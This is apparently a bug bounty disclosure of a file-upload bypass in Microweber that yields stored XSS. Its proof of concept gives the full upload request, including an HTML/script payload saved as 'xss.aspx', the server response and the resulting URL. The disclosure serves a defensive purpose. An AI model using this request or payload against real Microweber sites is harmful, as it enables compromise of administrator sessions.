Description

A user can bypass checking and upload .aspx file which lead to stored XSS.

Proof of Concept

• Log in as admin: https://demo.microweber.org/demo/admin/
• Go to Websites > Edit a page.
• Under Pictures, chooseAdd files
• Instead of uploading a normal picture, use the below request to upload an aspx file.

– The request to upload:

POST /demo/plupload HTTP/1.1
Host: demo.microweber.org
Cookie: csrf-token-data=%7B%22value%22%3A%22LbUJYT94IdMzaqSj3tCwbEgp402H94lb3LBdoQK8%22%2C%22expiry%22%3A1646836721840%7D; laravel_session=ZNv8dU4zHigWLlPFd8LQoeMyJtWGy8GK5Su1IA2F; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CTtYWLvivLcGGOKkv5QqtzWhOA7vw6wZPZIbryyJKGsVNHLLfQ4n75QWDNFH8%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu; back_to_admin=https%3A//demo.microweber.org/demo/admin/
Content-Length: 533
Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="98"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7ACkSBriVfqdfw4D
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Origin: https://demo.microweber.org
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.microweber.org/demo/admin/page/24/edit
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundary7ACkSBriVfqdfw4D
Content-Disposition: form-data; name="name"

xss.aspx
------WebKitFormBoundary7ACkSBriVfqdfw4D
Content-Disposition: form-data; name="chunk"

0
------WebKitFormBoundary7ACkSBriVfqdfw4D
Content-Disposition: form-data; name="chunks"

1
------WebKitFormBoundary7ACkSBriVfqdfw4D
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: text/html

<html>
<script>alert(document.domain)</script>
</html>
����IEND®B`‚
------WebKitFormBoundary7ACkSBriVfqdfw4D--

The response:

HTTP/1.1 200 OK
Date: Wed, 09 Mar 2022 14:26:01 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Mar 2022 14:26:01 GMT
Connection: close
Content-Type: application/json
Content-Length: 123

{"src":"https:\/\/demo.microweber.org\/demo\/userfiles\/media\/default\/xss.aspx","name":"xss.aspx","bytes_uploaded":"533"}

• Visit https://demo.microweber.org/demo/userfiles/media/default/xss.aspx to confirm the XSS.

Impact

If an attacker can control a script that is executed in the victim’s browser, then they can typically fully compromise that user, in this case, an admin.